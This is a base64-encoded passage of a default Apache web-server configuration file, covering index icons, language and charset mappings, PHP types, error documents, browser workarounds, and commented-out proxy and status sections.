LnNodG1sIC5odG0gLnBkZgogICAgQWRkSWNvbiAvaWNvbnMvdGV4dC5naWYgLnR4dAogICAgQWRk SWNvbiAvaWNvbnMvYy5naWYgLmMKICAgIEFkZEljb24gL2ljb25zL3AuZ2lmIC5wbCAucHkKICAg IEFkZEljb24gL2ljb25zL2YuZ2lmIC5mb3IKICAgIEFkZEljb24gL2ljb25zL2R2aS5naWYgLmR2 aQogICAgQWRkSWNvbiAvaWNvbnMvdXVlbmNvZGVkLmdpZiAudXUKICAgIEFkZEljb24gL2ljb25z L3NjcmlwdC5naWYgLmNvbmYgLnNoIC5zaGFyIC5jc2ggLmtzaCAudGNsCiAgICBBZGRJY29uIC9p Y29ucy90ZXguZ2lmIC50ZXgKICAgIEFkZEljb24gL2ljb25zL2JvbWIuZ2lmIGNvcmUKCiAgICBB ZGRJY29uIC9pY29ucy9iYWNrLmdpZiAuLgogICAgQWRkSWNvbiAvaWNvbnMvaGFuZC5yaWdodC5n aWYgUkVBRE1FCiAgICBBZGRJY29uIC9pY29ucy9mb2xkZXIuZ2lmIF5eRElSRUNUT1JZXl4KICAg IEFkZEljb24gL2ljb25zL2JsYW5rLmdpZiBeXkJMQU5LSUNPTl5eCgogICAgIwogICAgIyBEZWZh dWx0SWNvbiBpcyB3aGljaCBpY29uIHRvIHNob3cgZm9yIGZpbGVzIHdoaWNoIGRvIG5vdCBoYXZl IGFuIGljb24KICAgICMgZXhwbGljaXRseSBzZXQuCiAgICAjCiAgICBEZWZhdWx0SWNvbiAvaWNv bnMvdW5rbm93bi5naWYKCiAgICAjCiAgICAjIEFkZERlc2NyaXB0aW9uIGFsbG93cyB5b3UgdG8g cGxhY2UgYSBzaG9ydCBkZXNjcmlwdGlvbiBhZnRlciBhIGZpbGUgaW4KICAgICMgc2VydmVyLWdl bmVyYXRlZCBpbmRleGVzLiAgVGhlc2UgYXJlIG9ubHkgZGlzcGxheWVkIGZvciBGYW5jeUluZGV4 ZWQKICAgICMgZGlyZWN0b3JpZXMuCiAgICAjIEZvcm1hdDogQWRkRGVzY3JpcHRpb24gImRlc2Ny aXB0aW9uIiBmaWxlbmFtZQogICAgIwogICAgI0FkZERlc2NyaXB0aW9uICJHWklQIGNvbXByZXNz ZWQgZG9jdW1lbnQiIC5negogICAgI0FkZERlc2NyaXB0aW9uICJ0YXIgYXJjaGl2ZSIgLnRhcgog ICAgI0FkZERlc2NyaXB0aW9uICJHWklQIGNvbXByZXNzZWQgdGFyIGFyY2hpdmUiIC50Z3oKCiAg ICAjCiAgICAjIFJlYWRtZU5hbWUgaXMgdGhlIG5hbWUgb2YgdGhlIFJFQURNRSBmaWxlIHRoZSBz ZXJ2ZXIgd2lsbCBsb29rIGZvciBieQogICAgIyBkZWZhdWx0LCBhbmQgYXBwZW5kIHRvIGRpcmVj dG9yeSBsaXN0aW5ncy4KICAgICMKICAgICMgSGVhZGVyTmFtZSBpcyB0aGUgbmFtZSBvZiBhIGZp bGUgd2hpY2ggc2hvdWxkIGJlIHByZXBlbmRlZCB0bwogICAgIyBkaXJlY3RvcnkgaW5kZXhlcy4g CiAgICAjCiAgICAjIElmIE11bHRpVmlld3MgYXJlIGFtb25nc3QgdGhlIE9wdGlvbnMgaW4gZWZm ZWN0LCB0aGUgc2VydmVyIHdpbGwKICAgICMgZmlyc3QgbG9vayBmb3IgbmFtZS5odG1sIGFuZCBp bmNsdWRlIGl0IGlmIGZvdW5kLiAgSWYgbmFtZS5odG1sCiAgICAjIGRvZXNuJ3QgZXhpc3QsIHRo ZSBzZXJ2ZXIgd2lsbCB0aGVuIGxvb2sgZm9yIG5hbWUudHh0IGFuZCBpbmNsdWRlCiAgICAjIGl0 IGFzIHBsYWludGV4dCBpZiBmb3VuZC4KICAgICMKICAgIFJlYWRtZU5hbWUgUkVBRE1FCiAgICBI ZWFkZXJOYW1lIEhFQURFUgoKICAgICMKICAgICMgSW5kZXhJZ25vcmUgaXMgYSBzZXQgb2YgZmls ZW5hbWVzIHdoaWNoIGRpcmVjdG9yeSBpbmRleGluZyBzaG91bGQgaWdub3JlCiAgICAjIGFuZCBu b3QgaW5jbHVkZSBpbiB0aGUgbGlzdGluZy4gIFNoZWxsLXN0eWxlIHdpbGRjYXJkaW5nIGlzIHBl cm1pdHRlZC4KICAgICMKICAgIEluZGV4SWdub3JlIC4/PyogKn4gKiMgSEVBREVSKiBSRUFETUUq IFJDUyBDVlMgKix2ICosdAoKPC9JZk1vZHVsZT4KIyBFbmQgb2YgaW5kZXhpbmcgZGlyZWN0aXZl cy4KCiMKIyBEb2N1bWVudCB0eXBlcy4KIwo8SWZNb2R1bGUgbW9kX21pbWUuYz4KCiAgICAjCiAg ICAjIEFkZEVuY29kaW5nIGFsbG93cyB5b3UgdG8gaGF2ZSBjZXJ0YWluIGJyb3dzZXJzIChNb3Nh aWMvWCAyLjErKSB1bmNvbXByZXNzCiAgICAjIGluZm9ybWF0aW9uIG9uIHRoZSBmbHkuIE5vdGU6 IE5vdCBhbGwgYnJvd3NlcnMgc3VwcG9ydCB0aGlzLgogICAgIyBEZXNwaXRlIHRoZSBuYW1lIHNp bWlsYXJpdHksIHRoZSBmb2xsb3dpbmcgQWRkKiBkaXJlY3RpdmVzIGhhdmUgbm90aGluZwogICAg IyB0byBkbyB3aXRoIHRoZSBGYW5jeUluZGV4aW5nIGN1c3RvbWl6YXRpb24gZGlyZWN0aXZlcyBh Ym92ZS4KICAgICMKICAgIEFkZEVuY29kaW5nIHgtY29tcHJlc3MgWgogICAgQWRkRW5jb2Rpbmcg eC1nemlwIGd6IHRnegoKICAgICMKICAgICMgQWRkTGFuZ3VhZ2UgYWxsb3dzIHlvdSB0byBzcGVj aWZ5IHRoZSBsYW5ndWFnZSBvZiBhIGRvY3VtZW50LiBZb3UgY2FuCiAgICAjIHRoZW4gdXNlIGNv bnRlbnQgbmVnb3RpYXRpb24gdG8gZ2l2ZSBhIGJyb3dzZXIgYSBmaWxlIGluIGEgbGFuZ3VhZ2UK ICAgICMgaXQgY2FuIHVuZGVyc3RhbmQuICAKICAgICMKICAgICMgTm90ZSAxOiBUaGUgc3VmZml4 IGRvZXMgbm90IGhhdmUgdG8gYmUgdGhlIHNhbWUgYXMgdGhlIGxhbmd1YWdlIAogICAgIyBrZXl3 b3JkIC0tLSB0aG9zZSB3aXRoIGRvY3VtZW50cyBpbiBQb2xpc2ggKHdob3NlIG5ldC1zdGFuZGFy ZCAKICAgICMgbGFuZ3VhZ2UgY29kZSBpcyBwbCkgbWF5IHdpc2ggdG8gdXNlICJBZGRMYW5ndWFn ZSBwbCAucG8iIHRvIAogICAgIyBhdm9pZCB0aGUgYW1iaWd1aXR5IHdpdGggdGhlIGNvbW1vbiBz dWZmaXggZm9yIHBlcmwgc2NyaXB0cy4KICAgICMKICAgICMgTm90ZSAyOiBUaGUgZXhhbXBsZSBl bnRyaWVzIGJlbG93IGlsbHVzdHJhdGUgdGhhdCBpbiBxdWl0ZQogICAgIyBzb21lIGNhc2VzIHRo ZSB0d28gY2hhcmFjdGVyICdMYW5ndWFnZScgYWJicmV2aWF0aW9uIGlzIG5vdAogICAgIyBpZGVu dGljYWwgdG8gdGhlIHR3byBjaGFyYWN0ZXIgJ0NvdW50cnknIGNvZGUgZm9yIGl0cyBjb3VudHJ5 LAogICAgIyBFLmcuICdEYW5tYXJrL2RrJyB2ZXJzdXMgJ0RhbmlzaC9kYScuCiAgICAjCiAgICAj IE5vdGUgMzogSW4gdGhlIGNhc2Ugb2YgJ2x0eicgd2UgdmlvbGF0ZSB0aGUgUkZDIGJ5IHVzaW5n IGEgdGhyZWUgY2hhciAKICAgICMgc3BlY2lmaWVyLiBCdXQgdGhlcmUgaXMgJ3dvcmsgaW4gcHJv Z3Jlc3MnIHRvIGZpeCB0aGlzIGFuZCBnZXQgCiAgICAjIHRoZSByZWZlcmVuY2UgZGF0YSBmb3Ig cmZjMTc2NiBjbGVhbmVkIHVwLgogICAgIwogICAgIyBEYW5pc2ggKGRhKSAtIER1dGNoIChubCkg LSBFbmdsaXNoIChlbikgLSBFc3RvbmlhbiAoZWUpCiAgICAjIEZyZW5jaCAoZnIpIC0gR2VybWFu IChkZSkgLSBHcmVlay1Nb2Rlcm4gKGVsKQogICAgIyBJdGFsaWFuIChpdCkgLSBLb3JlYW4gKGty KSAtIE5vcndlZ2lhbiAobm8pCiAgICAjIFBvcnR1Z2VzZSAocHQpIC0gTHV4ZW1ib3VyZ2VvaXMq IChsdHopCiAgICAjIFNwYW5pc2ggKGVzKSAtIFN3ZWRpc2ggKHN2KSAtIENhdGFsYW4gKGNhKSAt IEN6ZWNoKGN6KQogICAgIyBQb2xpc2ggKHBsKSAtIEJyYXppbGlhbiBQb3J0dWd1ZXNlIChwdC1i cikgLSBKYXBhbmVzZSAoamEpCiAgICAjIFJ1c3NpYW4gKHJ1KQogICAgIwogICAgQWRkTGFuZ3Vh Z2UgZGEgLmRrCiAgICBBZGRMYW5ndWFnZSBubCAubmwKICAgIEFkZExhbmd1YWdlIGVuIC5lbgog ICAgQWRkTGFuZ3VhZ2UgZXQgLmVlCiAgICBBZGRMYW5ndWFnZSBmciAuZnIKICAgIEFkZExhbmd1 YWdlIGRlIC5kZQogICAgQWRkTGFuZ3VhZ2UgZWwgLmVsCiAgICBBZGRMYW5ndWFnZSBoZSAuaGUK ICAgIEFkZENoYXJzZXQgSVNPLTg4NTktOCAuaXNvODg1OS04CiAgICBBZGRMYW5ndWFnZSBpdCAu aXQKICAgIEFkZExhbmd1YWdlIGphIC5qYQogICAgQWRkQ2hhcnNldCBJU08tMjAyMi1KUCAuamlz CiAgICBBZGRMYW5ndWFnZSBrciAua3IKICAgIEFkZENoYXJzZXQgSVNPLTIwMjItS1IgLmlzby1r cgogICAgQWRkTGFuZ3VhZ2Ugbm8gLm5vCiAgICBBZGRMYW5ndWFnZSBwbCAucG8KICAgIEFkZENo YXJzZXQgSVNPLTg4NTktMiAuaXNvLXBsCiAgICBBZGRMYW5ndWFnZSBwdCAucHQKICAgIEFkZExh bmd1YWdlIHB0LWJyIC5wdC1icgogICAgQWRkTGFuZ3VhZ2UgbHR6IC5sdQogICAgQWRkTGFuZ3Vh Z2UgY2EgLmNhCiAgICBBZGRMYW5ndWFnZSBlcyAuZXMKICAgIEFkZExhbmd1YWdlIHN2IC5zZQog ICAgQWRkTGFuZ3VhZ2UgY3ogLmN6CiAgICBBZGRMYW5ndWFnZSBydSAucnUKICAgIEFkZExhbmd1 YWdlIHpoLXR3IC50dwogICAgQWRkTGFuZ3VhZ2UgdHcgLnR3CiAgICBBZGRDaGFyc2V0IEJpZzUg ICAgICAgICAuQmlnNSAgICAuYmlnNQogICAgQWRkQ2hhcnNldCBXSU5ET1dTLTEyNTEgLmNwLTEy NTEKICAgIEFkZENoYXJzZXQgQ1A4NjYgICAgICAgIC5jcDg2NgogICAgQWRkQ2hhcnNldCBJU08t ODg1OS01ICAgLmlzby1ydQogICAgQWRkQ2hhcnNldCBLT0k4LVIgICAgICAgLmtvaTgtcgogICAg QWRkQ2hhcnNldCBVQ1MtMiAgICAgICAgLnVjczIKICAgIEFkZENoYXJzZXQgVUNTLTQgICAgICAg IC51Y3M0CiAgICBBZGRDaGFyc2V0IFVURi04ICAgICAgICAudXRmOAoKICAgICMgTGFuZ3VhZ2VQ cmlvcml0eSBhbGxvd3MgeW91IHRvIGdpdmUgcHJlY2VkZW5jZSB0byBzb21lIGxhbmd1YWdlcwog ICAgIyBpbiBjYXNlIG9mIGEgdGllIGR1cmluZyBjb250ZW50IG5lZ290aWF0aW9uLgogICAgIwog ICAgIyBKdXN0IGxpc3QgdGhlIGxhbmd1YWdlcyBpbiBkZWNyZWFzaW5nIG9yZGVyIG9mIHByZWZl cmVuY2UuIFdlIGhhdmUKICAgICMgbW9yZSBvciBsZXNzIGFscGhhYmV0aXplZCB0aGVtIGhlcmUu IFlvdSBwcm9iYWJseSB3YW50IHRvIGNoYW5nZSB0aGlzLgogICAgIwogICAgPElmTW9kdWxlIG1v ZF9uZWdvdGlhdGlvbi5jPgogICAgICAgIExhbmd1YWdlUHJpb3JpdHkgZW4gZGEgbmwgZXQgZnIg ZGUgZWwgaXQgamEga3Igbm8gcGwgcHQgcHQtYnIgcnUgbHR6IGNhIGVzIHN2IHR3CiAgICA8L0lm TW9kdWxlPgoKICAgICMKICAgICMgQWRkVHlwZSBhbGxvd3MgeW91IHRvIHR3ZWFrIG1pbWUudHlw ZXMgd2l0aG91dCBhY3R1YWxseSBlZGl0aW5nIGl0LCBvciB0bwogICAgIyBtYWtlIGNlcnRhaW4g ZmlsZXMgdG8gYmUgY2VydGFpbiB0eXBlcy4KICAgICMKICAgICMgRm9yIGV4YW1wbGUsIHRoZSBQ SFAgMy54IG1vZHVsZSAobm90IHBhcnQgb2YgdGhlIEFwYWNoZSBkaXN0cmlidXRpb24gLSBzZWUK ICAgICMgaHR0cDovL3d3dy5waHAubmV0KSB3aWxsIHR5cGljYWxseSB1c2U6CiAgICAjCiAgICA8 SWZNb2R1bGUgbW9kX3BocDMuYz4KICAgICAgICBBZGRUeXBlIGFwcGxpY2F0aW9uL3gtaHR0cGQt cGhwMyAucGhwMwogICAgICAgIEFkZFR5cGUgYXBwbGljYXRpb24veC1odHRwZC1waHAzLXNvdXJj ZSAucGhwcwogICAgPC9JZk1vZHVsZT4KICAgICMKICAgICMgQW5kIGZvciBQSFAgNC54LCB1c2U6 CiAgICAjCiAgICA8SWZNb2R1bGUgbW9kX3BocDQuYz4KICAgICAgICBBZGRUeXBlIGFwcGxpY2F0 aW9uL3gtaHR0cGQtcGhwIC5waHAgLnBocDQgLnBocDMgLnBodG1sCiAgICAgICAgQWRkVHlwZSBh cHBsaWNhdGlvbi94LWh0dHBkLXBocC1zb3VyY2UgLnBocHMKICAgIDwvSWZNb2R1bGU+CgogICAg IwogICAgIyBGb3IgUEhQL0ZJIChQSFAyKSwgdXNlOgogICAgIwogICAgPElmTW9kdWxlIG1vZF9w aHAuYz4KICAgICAgICBBZGRUeXBlIGFwcGxpY2F0aW9uL3gtaHR0cGQtcGhwIC5waHRtbAogICAg PC9JZk1vZHVsZT4KCiAgICBBZGRUeXBlIGFwcGxpY2F0aW9uL3gtdGFyIC50Z3oKCiAgICAjCiAg ICAjIEFkZEhhbmRsZXIgYWxsb3dzIHlvdSB0byBtYXAgY2VydGFpbiBmaWxlIGV4dGVuc2lvbnMg dG8gImhhbmRsZXJzIiwKICAgICMgYWN0aW9ucyB1bnJlbGF0ZWQgdG8gZmlsZXR5cGUuIFRoZXNl IGNhbiBiZSBlaXRoZXIgYnVpbHQgaW50byB0aGUgc2VydmVyCiAgICAjIG9yIGFkZGVkIHdpdGgg dGhlIEFjdGlvbiBjb21tYW5kIChzZWUgYmVsb3cpCiAgICAjCiAgICAjIElmIHlvdSB3YW50IHRv IHVzZSBzZXJ2ZXIgc2lkZSBpbmNsdWRlcywgb3IgQ0dJIG91dHNpZGUKICAgICMgU2NyaXB0QWxp YXNlZCBkaXJlY3RvcmllcywgdW5jb21tZW50IHRoZSBmb2xsb3dpbmcgbGluZXMuCiAgICAjCiAg ICAjIFRvIHVzZSBDR0kgc2NyaXB0czoKICAgICMKICAgICNBZGRIYW5kbGVyIGNnaS1zY3JpcHQg LmNnaQoKICAgICMKICAgICMgVG8gdXNlIHNlcnZlci1wYXJzZWQgSFRNTCBmaWxlcwogICAgIwog ICAgQWRkVHlwZSB0ZXh0L2h0bWwgLnNodG1sCiAgICBBZGRIYW5kbGVyIHNlcnZlci1wYXJzZWQg LnNodG1sCgogICAgIwogICAgIyBVbmNvbW1lbnQgdGhlIGZvbGxvd2luZyBsaW5lIHRvIGVuYWJs ZSBBcGFjaGUncyBzZW5kLWFzaXMgSFRUUCBmaWxlCiAgICAjIGZlYXR1cmUKICAgICMKICAgICNB ZGRIYW5kbGVyIHNlbmQtYXMtaXMgYXNpcwoKICAgICMKICAgICMgSWYgeW91IHdpc2ggdG8gdXNl IHNlcnZlci1wYXJzZWQgaW1hZ2VtYXAgZmlsZXMsIHVzZQogICAgIwogICAgQWRkSGFuZGxlciBp bWFwLWZpbGUgbWFwCgogICAgIwogICAgIyBUbyBlbmFibGUgdHlwZSBtYXBzLCB5b3UgbWlnaHQg d2FudCB0byB1c2UKICAgICMKICAgICNBZGRIYW5kbGVyIHR5cGUtbWFwIHZhcgoKPC9JZk1vZHVs ZT4KIyBFbmQgb2YgZG9jdW1lbnQgdHlwZXMuCgojCiMgQWN0aW9uIGxldHMgeW91IGRlZmluZSBt ZWRpYSB0eXBlcyB0aGF0IHdpbGwgZXhlY3V0ZSBhIHNjcmlwdCB3aGVuZXZlcgojIGEgbWF0Y2hp bmcgZmlsZSBpcyBjYWxsZWQuIFRoaXMgZWxpbWluYXRlcyB0aGUgbmVlZCBmb3IgcmVwZWF0ZWQg VVJMCiMgcGF0aG5hbWVzIGZvciBvZnQtdXNlZCBDR0kgZmlsZSBwcm9jZXNzb3JzLgojIEZvcm1h dDogQWN0aW9uIG1lZGlhL3R5cGUgL2NnaS1zY3JpcHQvbG9jYXRpb24KIyBGb3JtYXQ6IEFjdGlv biBoYW5kbGVyLW5hbWUgL2NnaS1zY3JpcHQvbG9jYXRpb24KIwoKIwojIE1ldGFEaXI6IHNwZWNp ZmllcyB0aGUgbmFtZSBvZiB0aGUgZGlyZWN0b3J5IGluIHdoaWNoIEFwYWNoZSBjYW4gZmluZAoj IG1ldGEgaW5mb3JtYXRpb24gZmlsZXMuIFRoZXNlIGZpbGVzIGNvbnRhaW4gYWRkaXRpb25hbCBI VFRQIGhlYWRlcnMKIyB0byBpbmNsdWRlIHdoZW4gc2VuZGluZyB0aGUgZG9jdW1lbnQKIwojTWV0 YURpciAud2ViCgojCiMgTWV0YVN1ZmZpeDogc3BlY2lmaWVzIHRoZSBmaWxlIG5hbWUgc3VmZml4 IGZvciB0aGUgZmlsZSBjb250YWluaW5nIHRoZQojIG1ldGEgaW5mb3JtYXRpb24uCiMKI01ldGFT dWZmaXggLm1ldGEKCiMKIyBDdXN0b21pemFibGUgZXJyb3IgcmVzcG9uc2UgKEFwYWNoZSBzdHls ZSkKIyAgdGhlc2UgY29tZSBpbiB0aHJlZSBmbGF2b3JzCiMKIyAgICAxKSBwbGFpbiB0ZXh0CiNF cnJvckRvY3VtZW50IDUwMCAiVGhlIHNlcnZlciBtYWRlIGEgYm9vIGJvby4KIyAgbi5iLiAgdGhl IHNpbmdsZSBsZWFkaW5nICgiKSBtYXJrcyBpdCBhcyB0ZXh0LCBpdCBkb2VzIG5vdCBnZXQgb3V0 cHV0CiMKIyAgICAyKSBsb2NhbCByZWRpcmVjdHMKI0Vycm9yRG9jdW1lbnQgNDA0IC9taXNzaW5n Lmh0bWwKIyAgdG8gcmVkaXJlY3QgdG8gbG9jYWwgVVJMIC9taXNzaW5nLmh0bWwKI0Vycm9yRG9j dW1lbnQgNDA0IC9jZ2ktYmluL21pc3NpbmdfaGFuZGxlci5wbAojICBOLkIuOiBZb3UgY2FuIHJl ZGlyZWN0IHRvIGEgc2NyaXB0IG9yIGEgZG9jdW1lbnQgdXNpbmcgc2VydmVyLXNpZGUtaW5jbHVk ZXMuCiMKIyAgICAzKSBleHRlcm5hbCByZWRpcmVjdHMKI0Vycm9yRG9jdW1lbnQgNDAyIGh0dHA6 Ly9zb21lLm90aGVyX3NlcnZlci5jb20vc3Vic2NyaXB0aW9uX2luZm8uaHRtbAojICBOLkIuOiBN YW55IG9mIHRoZSBlbnZpcm9ubWVudCB2YXJpYWJsZXMgYXNzb2NpYXRlZCB3aXRoIHRoZSBvcmln aW5hbAojICByZXF1ZXN0IHdpbGwgKm5vdCogYmUgYXZhaWxhYmxlIHRvIHN1Y2ggYSBzY3JpcHQu CgojCiMgQ3VzdG9taXplIGJlaGF2aW91ciBiYXNlZCBvbiB0aGUgYnJvd3NlcgojCjxJZk1vZHVs ZSBtb2Rfc2V0ZW52aWYuYz4KCiAgICAjCiAgICAjIFRoZSBmb2xsb3dpbmcgZGlyZWN0aXZlcyBt b2RpZnkgbm9ybWFsIEhUVFAgcmVzcG9uc2UgYmVoYXZpb3IuCiAgICAjIFRoZSBmaXJzdCBkaXJl Y3RpdmUgZGlzYWJsZXMga2VlcGFsaXZlIGZvciBOZXRzY2FwZSAyLnggYW5kIGJyb3dzZXJzIHRo YXQKICAgICMgc3Bvb2YgaXQuIFRoZXJlIGFyZSBrbm93biBwcm9ibGVtcyB3aXRoIHRoZXNlIGJy b3dzZXIgaW1wbGVtZW50YXRpb25zLgogICAgIyBUaGUgc2Vjb25kIGRpcmVjdGl2ZSBpcyBmb3Ig TWljcm9zb2Z0IEludGVybmV0IEV4cGxvcmVyIDQuMGIyCiAgICAjIHdoaWNoIGhhcyBhIGJyb2tl biBIVFRQLzEuMSBpbXBsZW1lbnRhdGlvbiBhbmQgZG9lcyBub3QgcHJvcGVybHkKICAgICMgc3Vw cG9ydCBrZWVwYWxpdmUgd2hlbiBpdCBpcyB1c2VkIG9uIDMwMSBvciAzMDIgKHJlZGlyZWN0KSBy ZXNwb25zZXMuCiAgICAjCiAgICBCcm93c2VyTWF0Y2ggIk1vemlsbGEvMiIgbm9rZWVwYWxpdmUK ICAgIEJyb3dzZXJNYXRjaCAiTVNJRSA0XC4wYjI7IiBub2tlZXBhbGl2ZSBkb3duZ3JhZGUtMS4w IGZvcmNlLXJlc3BvbnNlLTEuMAoKICAgICMKICAgICMgVGhlIGZvbGxvd2luZyBkaXJlY3RpdmUg ZGlzYWJsZXMgSFRUUC8xLjEgcmVzcG9uc2VzIHRvIGJyb3dzZXJzIHdoaWNoCiAgICAjIGFyZSBp biB2aW9sYXRpb24gb2YgdGhlIEhUVFAvMS4wIHNwZWMgYnkgbm90IGJlaW5nIGFibGUgdG8gZ3Jv ayBhCiAgICAjIGJhc2ljIDEuMSByZXNwb25zZS4KICAgICMKICAgIEJyb3dzZXJNYXRjaCAiUmVh bFBsYXllciA0XC4wIiBmb3JjZS1yZXNwb25zZS0xLjAKICAgIEJyb3dzZXJNYXRjaCAiSmF2YS8x XC4wIiBmb3JjZS1yZXNwb25zZS0xLjAKICAgIEJyb3dzZXJNYXRjaCAiSkRLLzFcLjAiIGZvcmNl LXJlc3BvbnNlLTEuMAoKPC9JZk1vZHVsZT4KIyBFbmQgb2YgYnJvd3NlciBjdXN0b21pemF0aW9u IGRpcmVjdGl2ZXMKCiMKIyBJZiB0aGUgcGVybCBtb2R1bGUgaXMgaW5zdGFsbGVkLCB0aGlzIHdp bGwgYWxsb3cgZXhlY3V0aW9uIG9mIG1vZF9wZXJsCiMgdG8gY29tcGlsZSB5b3VyIHNjcmlwdHMg dG8gc3Vicm91dGluZXMgd2hpY2ggaXQgd2lsbCBleGVjdXRlIGRpcmVjdGx5LAojIGF2b2lkaW5n IHRoZSBjb3N0bHkgY29tcGlsZSBwcm9jZXNzIGZvciBtb3N0IHJlcXVlc3RzLgojCiM8SWZNb2R1 bGUgbW9kX3BlcmwuYz4KIyAgICBBbGlhcyAvcGVybCAvdmFyL3d3dy9wZXJsCiMgICAgPERpcmVj dG9yeSAvdmFyL3d3dy9wZXJsPgojICAgICAgICBTZXRIYW5kbGVyIHBlcmwtc2NyaXB0CiMgICAg ICAgIFBlcmxIYW5kbGVyIEFwYWNoZTo6UmVnaXN0cnkKIyAgICAgICAgT3B0aW9ucyArRXhlY0NH SQojICAgIDwvRGlyZWN0b3J5PgojPC9JZk1vZHVsZT4KCiMKIyBBbGxvdyBodHRwIHB1dCAoc3Vj aCBhcyBOZXRzY2FwZSBHb2xkJ3MgcHVibGlzaCBmZWF0dXJlKQojIFVzZSBodHBhc3N3ZCB0byBn ZW5lcmF0ZSAvZXRjL2h0dHBkL2NvbmYvcGFzc3dkLgojCiM8SWZNb2R1bGUgbW9kX3B1dC5jPgoj ICAgIEFsaWFzIC91cGxvYWQgL3RtcAojICAgIDxEaXJlY3RvcnkgL3RtcD4KIyAgICAgICAgRW5h YmxlUHV0IE9uCiMgICAgICAgIEF1dGhUeXBlIEJhc2ljCiMgICAgICAgIEF1dGhOYW1lIFRlbXBv cmFyeQojICAgICAgICBBdXRoVXNlckZpbGUgL2V0Yy9odHRwZC9jb25mL3Bhc3N3ZAojICAgICAg ICBFbmFibGVEZWxldGUgT2ZmCiMgICAgICAgIHVtYXNrIDAwNwojICAgICAgICA8TGltaXQgUFVU PgojICAgICAgICAgICAgcmVxdWlyZSB2YWxpZC11c2VyCiMgICAgICAgIDwvTGltaXQ+CiMgICAg PC9EaXJlY3Rvcnk+CiM8L0lmTW9kdWxlPgoKIwojIEFsbG93IHNlcnZlciBzdGF0dXMgcmVwb3J0 cywgd2l0aCB0aGUgVVJMIG9mIGh0dHA6Ly9zZXJ2ZXJuYW1lL3NlcnZlci1zdGF0dXMKIyBDaGFu Z2UgdGhlICIueW91cl9kb21haW4uY29tIiB0byBtYXRjaCB5b3VyIGRvbWFpbiB0byBlbmFibGUu CiMKIzxMb2NhdGlvbiAvc2VydmVyLXN0YXR1cz4KIyAgICBTZXRIYW5kbGVyIHNlcnZlci1zdGF0 dXMKIyAgICBPcmRlciBkZW55LGFsbG93CiMgICAgRGVueSBmcm9tIGFsbAojICAgIEFsbG93IGZy b20gLnlvdXJfZG9tYWluLmNvbQojPC9Mb2NhdGlvbj4KCiMKIyBBbGxvdyByZW1vdGUgc2VydmVy IGNvbmZpZ3VyYXRpb24gcmVwb3J0cywgd2l0aCB0aGUgVVJMIG9mCiMgaHR0cDovL3NlcnZlcm5h bWUvc2VydmVyLWluZm8gKHJlcXVpcmVzIHRoYXQgbW9kX2luZm8uYyBiZSBsb2FkZWQpLgojIENo YW5nZSB0aGUgIi55b3VyX2RvbWFpbi5jb20iIHRvIG1hdGNoIHlvdXIgZG9tYWluIHRvIGVuYWJs ZS4KIwojPExvY2F0aW9uIC9zZXJ2ZXItaW5mbz4KIyAgICBTZXRIYW5kbGVyIHNlcnZlci1pbmZv CiMgICAgT3JkZXIgZGVueSxhbGxvdwojICAgIERlbnkgZnJvbSBhbGwKIyAgICBBbGxvdyBmcm9t IC55b3VyX2RvbWFpbi5jb20KIzwvTG9jYXRpb24+CgojCiMgQWxsb3cgYWNjZXNzIHRvIGxvY2Fs IHN5c3RlbSBkb2N1bWVudGF0aW9uIGZyb20gbG9jYWxob3N0CiMKQWxpYXMgL2RvYy8gL3Vzci9z aGFyZS9kb2MvCjxEaXJlY3RvcnkgL3Vzci9zaGFyZS9kb2M+CiAgICBvcmRlciBkZW55LGFsbG93 CiAgICBkZW55IGZyb20gYWxsCiAgICBhbGxvdyBmcm9tIGxvY2FsaG9zdCAubG9jYWxkb21haW4K ICAgIE9wdGlvbnMgSW5kZXhlcyBGb2xsb3dTeW1MaW5rcwo8L0RpcmVjdG9yeT4KCiMKIyBUaGVy ZSBoYXZlIGJlZW4gcmVwb3J0cyBvZiBwZW9wbGUgdHJ5aW5nIHRvIGFidXNlIGFuIG9sZCBidWcg ZnJvbSBwcmUtMS4xCiMgZGF5cy4gIFRoaXMgYnVnIGludm9sdmVkIGEgQ0dJIHNjcmlwdCBkaXN0 cmlidXRlZCBhcyBhIHBhcnQgb2YgQXBhY2hlLgojIEJ5IHVuY29tbWVudGluZyB0aGVzZSBsaW5l cyB5b3UgY2FuIHJlZGlyZWN0IHRoZXNlIGF0dGFja3MgdG8gYSBsb2dnaW5nIAojIHNjcmlwdCBv biBwaGYuYXBhY2hlLm9yZy4gIE9yLCB5b3UgY2FuIHJlY29yZCB0aGVtIHlvdXJzZWxmLCB1c2lu ZyB0aGUgc2NyaXB0CiMgc3VwcG9ydC9waGZfYWJ1c2VfbG9nLmNnaS4KIwojPExvY2F0aW9uIC9j Z2ktYmluL3BoZio+CiMgICAgRGVueSBmcm9tIGFsbAojICAgIEVycm9yRG9jdW1lbnQgNDAzIGh0 dHA6Ly9waGYuYXBhY2hlLm9yZy9waGZfYWJ1c2VfbG9nLmNnaQojPC9Mb2NhdGlvbj4KCiMKIyBQ cm94eSBTZXJ2ZXIgZGlyZWN0aXZlcy4gVW5jb21tZW50IHRoZSBmb2xsb3dpbmcgbGluZXMgdG8K IyBlbmFibGUgdGhlIHByb3h5IHNlcnZlcjoKIwojPElmTW9kdWxlIG1vZF9wcm94eS5jPgojICAg IFByb3h5UmVxdWVzdHMgT24KCiMgICAgPERpcmVjdG9yeSBwcm94eToqPgojICAgICAgICBPcmRl ciBkZW55LGFsbG93CiMgICAgICAgIERlbnkgZnJvbSBhbGwKIyAgICAgICAgQWxsb3cgZnJvbSAu eW91cl9kb21haW4uY29tCiMgICAgPC9EaXJlY3Rvcnk+CgogICAgIwogICAgIyBFbmFibGUvZGlz YWJsZSB0aGUgaGFuZGxpbmcgb2YgSFRUUC8xLjEgIlZpYToiIGhlYWRlcnMuCiAgICAjICgiRnVs bCIgYWRkcyB0aGUgc2VydmVyIHZlcnNpb247ICJCbG9jayIgcmVtb3ZlcyBhbGwgb3V0Z29pbmcg VmlhOiBoZWFkZXJzKQogICAgIyBTZXQgdG8gb25lIG9mOiBPZmYgfCBPbiB8IEZ1bGwgfCBCbG9j awogICAgIwojICAgIFByb3h5VmlhIE9uCgogICAgIwogICAgIyBUbyBlbmFibGUgdGhlIGNhY2hl IGFzIHdlbGwsIGVkaXQgYW5kIHVuY29tbWVudCB0aGUgZm9sbG93aW5nIGxpbmVzOgogICAgIyAo bm8gY2FjaGluZyB3aXRob3V0IENhY2hlUm9vdCkKICAgICMKIyAgICBDYWNoZVJvb3QgIi92YXIv Y2FjaGUvaHR0cGQiCiMgICAgQ2FjaGVTaXplIDUKIyAgICBDYWNoZUdjSW50ZXJ2YWwgNAojICAg 